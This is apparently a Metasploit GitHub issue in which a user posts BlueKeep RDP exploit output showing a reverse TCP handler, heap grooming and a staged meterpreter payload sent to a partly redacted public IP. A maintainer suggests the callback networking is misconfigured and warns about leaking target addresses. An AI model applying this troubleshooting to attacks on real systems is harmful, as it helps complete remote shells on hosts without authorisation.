### ISSUE TITLE
Bluekeep "meterpreter > shell [-] Unknown command: shell."

### ISSUE THREAD

**Issue by kosmosx2** [rapid7/metasploit-framework#12339]
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 78.X8X.1X4.151:3389   - Detected RDP on 7X.1X6.1X4.1X1:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 7X.1X6.1X4.1X1:3389   - The target is vulnerable.
[*] 78.X86.1X4.1X1:3389 - Using CHUNK grooming strategy. Size 3MB, target address 0xfffffa8002707000, Channel count 1.
[*] 7X.1X6.1X4.1X1:3389 - Surfing channels ...
[*] 7X.1X6.1X4.1X1:3389 - Lobbing eggs ...
[*] Sending stage (206403 bytes) to 78.186.114.5
[*] 7X.1X6.1X4.1X1:3389 - Forcing the USE of FREE'd object ...

**meterpreter > shell
[-] Unknown command: shell.
meterpreter >**

**Comment by busterb** [comment]
This generally means you have networking setup incorrectly. Your stager is calling back, but the networking after that is incorrect. Maybe you have LHOST set to a private IP?  At any rate, it also appears that you are leaking your target's public IP addresses on a public forum, and redacting random numbers on different lines not the best strategy.
